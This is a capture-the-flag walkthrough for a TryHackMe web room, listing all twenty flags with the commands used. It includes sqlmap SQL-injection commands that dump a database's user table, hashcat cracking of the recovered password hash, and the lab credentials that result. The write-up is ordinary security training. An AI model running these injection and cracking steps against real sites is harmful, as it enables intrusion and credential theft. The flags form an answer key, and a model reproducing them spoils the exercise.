CTF collection Vol.2

Note: All the challenges flag are formatted as THM{flag}, unless stated otherwise

  • Easter 1 THM{4u70b07_r0ll_0u7} (ip/robots.txt /decode from hex)

  • Easter 2 THM{f4ll3n_b453} (decode from base 64 till get DesKel_secret_base then go to path)

  • Easter 3 THM{y0u_c4n'7_533_m3} (gobuster found /login path/view source code)

  • Easter 4 THM{1nj3c7_l1k3_4_b055} (first use burpsuite and save the POST request like request.txt or another then

sqlmap -r request.txt --dbs --batch

will give me the name of 4 dbs available which one of these is THM_f0und_m3 sqlmap

Now let’s dump the tables

sqlmap -r request.txt --dbs --batch -D THM_f0und_m3 --tables

found two tables nothing_inside and user

Let’s see the structure of the nothing_inside table

sqlmap -r request.txt --dbs --batch -D THM_f0und_m3 -T nothing_inside --columns

found Easter_4 Only 1 field, let’s dump the table:

sqlmap -r request.txt --dbs --batch -D THM_f0und_m3 -T nothing_inside -C Easter_4 --sql-query "select Easter_4 from nothing_inside"

[23:14:25] [INFO] adjusting time delay to 2 seconds due to good response times THM{1nj3c7_l1k3_4_b0 [23:17:42] [ERROR] invalid character detected. retrying.. [23:17:42] [WARNING] increasing time delay to 3 seconds 55} select Easter_4 from nothing_inside: 'THM{1nj3c7_l1k3_4_b055}' [23:18:23] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/' [*] ending @ 23:18:23 /2022-08-12/

  • Easter 5 *THM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql} *

Still using the same SQL injection as for easter 4, let’s dump the user table

sqlmap -r request.txt --dbs --batch -D THM_f0und_m3 -T user --columns

found password and username

sqlmap -r request.txt --batch -D THM_f0und_m3 -T user -C username,password --sql-query "select username,password from user"

hashcat (or john)

nano hashctf2
hashcat -m 0 hashctf2 /usr/share/wordlists/rockyou.txt


then login to http://IP/login with the credentials

==Deskel:cutie== give me

  • Easter 6 THM{l37'5_p4r7y_h4rd} (curl -s ip -D header.txt / then cat header.txt)

  • Easter 7 THM{w3lc0m3!_4nd_w3lc0m3} (change cookie value to 1 in inspect mode then refresh page)

  • Easter 8 *THM{h3y_r1ch3r_wh3r3_15_my_k1dn3y} * (curl -s --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1" http://IP/ | grep "Easter 8")

  • Easter 9 THM{60nn4_60_f457} (curl -s http://IP/ready/) or using wget but will download it

  • Easter 10 *THM{50rry_dud3} * (curl -s --referer "tryhackme.com" http://IP/free_sub/)

  • Easter 11 THM{366y_b4k3y} ( curl -s -d "dinner=egg" -X POST http://IP/ | grep menu -B 1 )

  • Easter 12 *THM{h1dd3n_j5_f1l3} * (curl -s http://IP/ | grep ".js" ) then found jquery-9.1.2.js so (curl -s http://IP/jquery-9.1.2) found a function - copy and go to jscript

function ahem() { str1 = '4561737465722031322069732054484d7b68316464336e5f6a355f66316c337d' var hex = str1.toString(); var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } return str; } document.write(ahem());

==Easter 12 is THM{h1dd3n_j5_f1l3} ==

  • Easter 13 THM{1_c4n'7_b3l13v3_17} (press the button)

  • Easter 14 THM{d1r3c7_3mb3d} cyberchef

  • Easter 15 *THM{ju57_4_64m3} * (#1st curl -d "answer=abcdefghijklmnopqrstuvwxyz" -X POST http://IP/game1/ give me another hash then / curl -d "answer=ABCDEFGHIJKLMNOPQRSTUVWXYZ" -X POST http://IP/game1/ the same hash and with the hints

hints: 51 89 77 93 126 14 93 10 We now have the numbers associated to each upper (99=A, 100=B, 101=C, … 141=Z) and lower (89=a, 90=b, …, 18=z)

decode : GameOver : enter like answ or curl -d "answer=GameOver" -X POST http://IP/game1/

  • Easter 16 THM{73mp3r_7h3_h7ml} (curl -d "button1=button1&button2=button2&button3=button3" -X POST http://IP/game2/ ) La vulnerabilidad de tipo Parameter Tampering consiste en la manipulación del valor de algún parámetro que se intercambia entre cliente y servidor

  • Easter 17 THM{j5_j5_k3p_d3c0d3}

bin -> dec -> hex -> ascii rapidtables ==Easter 17: THM{j5_j5_k3p_d3c0d3}==

  • Easter 18 THM{70ny_r0ll_7h3_366} (curl -s -H "egg: Yes" http://IP/ | grep -i "Easter 18")

Request header. Format is egg:Yes

  • Easter 19 THM{700_5m4ll_3yy} (gobuster/ small path /img)

  • Easter 20 *THM{17_w45_m3_4ll_4l0n6} * (curl -s -d "username=DesKel&password=heIsDumb" -X POST http://IP/ | grep -A 1 "Easter 20")

You need to POST the data instead of GET. Burp suite or curl might help.

[[REmux The Tmux]]

Last updated